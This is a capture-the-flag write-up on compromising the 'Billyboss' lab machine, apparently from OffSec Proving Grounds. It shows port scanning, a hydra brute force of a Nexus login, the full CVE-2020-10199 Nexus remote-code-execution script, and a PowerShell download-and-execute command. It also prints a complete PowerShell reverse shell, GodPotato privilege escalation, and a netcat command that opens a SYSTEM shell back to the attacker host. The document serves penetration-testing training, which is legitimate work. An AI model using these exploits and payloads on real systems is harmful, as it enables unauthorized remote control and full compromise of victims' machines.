Billyboss

Enumeration:

Port Scanning:

As always we are going to start with port scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.182.61
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 12:09 EST
Nmap scan report for 192.168.182.61
Host is up, received echo-reply ttl 125 (0.11s latency).
Scanned at 2025-11-10 12:09:20 EST for 198s 
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 125 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: BaGet
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-favicon: Unknown favicon MD5: 8D9ADDAFA993A4318E476ED8EB0C8061
| http-methods: 
|_  Supported Methods: GET HEAD
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
5040/tcp  open  unknown       syn-ack ttl 125
7680/tcp  open  pando-pub?    syn-ack ttl 125
8081/tcp  open  http          syn-ack ttl 125 Jetty 9.4.18.v20190429
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: Nexus/3.21.0-05 (OSS) 
|_http-favicon: Unknown favicon MD5: 9A008BECDE9C5F250EDAD4F00E567721
|_http-title: Nexus Repository Manager
| http-robots.txt: 2 disallowed entries 
|_/repository/ /service/
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>

We have ftp running on port 21, http on ports 80, and 8081, smb on port 445.

HTTP (80):

We can play and search with the upload and push functionalities, but that is not the way in:

HTTP (8081):

Here we have sonatype nexus repositry manager running.

I searched for public exploits for this specific service:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ searchsploit Sonatype Nexus                    
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)                                                                             | java/webapps/49385.py
Sonatype Nexus Repository 3.53.0-01 - Path Traversal                                                                                      | multiple/webapps/52101.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

We have RCE, and the version is mostly the same as ours but newer.

As stated in the title (Authenticated) so we need to login.

I tried a lot of default credentials, and searched online for specific default credentials for this, and could not login, I finally used nexus:nexus and:

Or we can use cewl to download the keywords from that page, and brute force the login form with hydra.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cewl http://192.168.182.61:8081/ --lowercase
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
nexus
repository
manager
loading
form
history
browse
spinner
logo
product
oss
ico
favicon
resources
rapture
static
http
src
image
new

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cewl http://192.168.182.61:8081/ --lowercase > words.txt

We can get the endpoint of the login request, and the parameters through burpsuite or easily with the browser developer tools under network:

We will notice the username, and password were base64 encoded.

Lets build our command and run it:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]                                                                                                                  
└─$ hydra -L words.txt -P words.txt 192.168.182.61 http-post-form -s 8081 '/service/rapture/session:username=^USER64^&password=^PASS64^:F=403' -I                           
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these 
*** ignore laws and ethics anyway).                                                                                                                                         
                                                                                                                                                                            
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-10 12:37:26                                                                                          
[DATA] max 16 tasks per 1 server, overall 16 tasks, 441 login tries (l:21/p:21), ~28 tries per task                                                                         
[DATA] attacking http-post-form://192.168.182.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:F=403                                                     
[8081][http-post-form] host: 192.168.182.61   login: nexus   password: nexus                                                                                                
1 of 1 target successfully completed, 1 valid password found                                                                                                                
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-10 12:37:51

We will find the same result.

Exploitation:

Now lets pull our exploit, and adjust it to fit what we want then execute it:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ searchsploit -m java/webapps/49385.py     
  Exploit: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
      URL: https://www.exploit-db.com/exploits/49385
     Path: /usr/share/exploitdb/exploits/java/webapps/49385.py
    Codes: CVE-2020-10199
 Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Billyboss/49385.py

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cat 49385.py 
# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Hompage: https://www.sonatype.com/ 
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
#
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
#!/usr/bin/python3

import sys
import base64
import requests

URL='http://192.168.1.1:8081'
CMD='cmd.exe /c calc.exe'
USERNAME='admin'
PASSWORD='password'

s = requests.Session()
print('Logging in')
body = {
    'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
    'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
    print('Login unsuccessful')
    print(r.status_code)
    sys.exit(1)
print('Logged in successfully')

body = {
    'name': 'internal',
    'online': True,
    'storage': {
        'blobStoreName': 'default',
        'strictContentTypeValidation': True 
    },
    'group': {
        'memberNames': [
            '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
        ]
    },
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
    print('Command executed')
    sys.exit(0)
else:
    print('Error executing command, the following was returned by Nexus')
    print(r.text)

What we will edit is the username:password, and target url, and finally the command to run:

<snipped>

URL='http://192.168.182.61:8081'
CMD='powershell -c IEX(IWR -UseBasicParsing -Uri http://192.168.45.187:8000/shell.ps1)'
USERNAME='nexus'
PASSWORD='nexus'

<snipped>

Serve our shell.ps1 file with python web server:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cat shell.ps1   
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.187',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]                            
└─$ python3 -m http.server                                                            
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Start a netcat listener as well:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...

Execute our script:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ python3 49385.py
Logging in
Logged in successfully
Command executed

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.61] 50251

PS C:\Users\nathan\Nexus\nexus-3.21.0-05>

Here we have a shell.

Post-Exploitation:

PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami /all                                                                                                                       
                                                                                                                                                                            
USER INFORMATION                                                                                                                                                            
----------------                                                                                                                                                            
                                                                                                                                                                            
User Name        SID                                                                                                                                                        
================ ==============================================                                                                                                             
billyboss\nathan S-1-5-21-2389609380-2620298947-1153829925-1001                                                                                                             
                                                                                                                                                                            
                                                                                                                                                                            
GROUP INFORMATION                                                                                                                                                           
-----------------                                                                                                                                                           
                                                                                                                                                                            
Group Name                           Type             SID          Attributes                                                                                               
==================================== ================ ============ ==================================================                                                       
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group                                                       
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group                                                       
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group                                                       
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group                                                       
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group                                                       
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group                                                       
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group                                                       
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group                                                       
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                                                                          
                                                                                                                                                                            
                                                                                                                                                                            
PRIVILEGES INFORMATION                                                                                                                                                      
----------------------                                                                                                                                                      
                                                                                                                                                                            
Privilege Name                Description                               State                                                                                               
============================= ========================================= ========                                                                                            
SeShutdownPrivilege           Shut down the system                      Disabled                                                                                            
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Here we have again SeImpersonatePrivilege privilege, lets upload GodPotato and nc to the target:

PS C:\Windows\Tasks> curl http://192.168.45.187:8000/GodPotato-NET4.exe -o GodPotato-NET4.exe
PS C:\Windows\Tasks> curl http://192.168.45.187:8000/nc.exe -o nc.exe                  
PS C:\Windows\Tasks> dir


    Directory: C:\Windows\Tasks


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----       11/10/2025   9:42 AM          57344 GodPotato-NET4.exe                                                     
-a----       11/10/2025   9:42 AM          59392 nc.exe

Start another netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...

Run GodPotato:

PS C:\Windows\Tasks> .\GodPotato-NET4.exe -cmd "C:\Windows\Tasks\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.187 80"
[*] CombaseModule: 0x140711670317056
[*] DispatchTable: 0x140711672659552
[*] UseProtseqFunction: 0x140711672027584
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\f13a5021-5994-436a-820a-c28f5c614f1c\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-1020-ffff-55e0-c644c9a86527
[*] DCOM obj OXID: 0xbf0a166078ef8da5
[*] DCOM obj OID: 0x35b17bd2aed74d00
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 840 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation 
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1508

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.61] 50266
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>set username
USERNAME=BILLYBOSS$

C:\Windows\system32>hostname
billyboss

Here we have a shell as system.

Get the flags:

C:\Windows\system32>type C:\Users\nathan\Desktop\local.txt
3a0141572f8eeb4591587a7616f7c54c

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
27da912b734bca4feaf77d4142d40bb1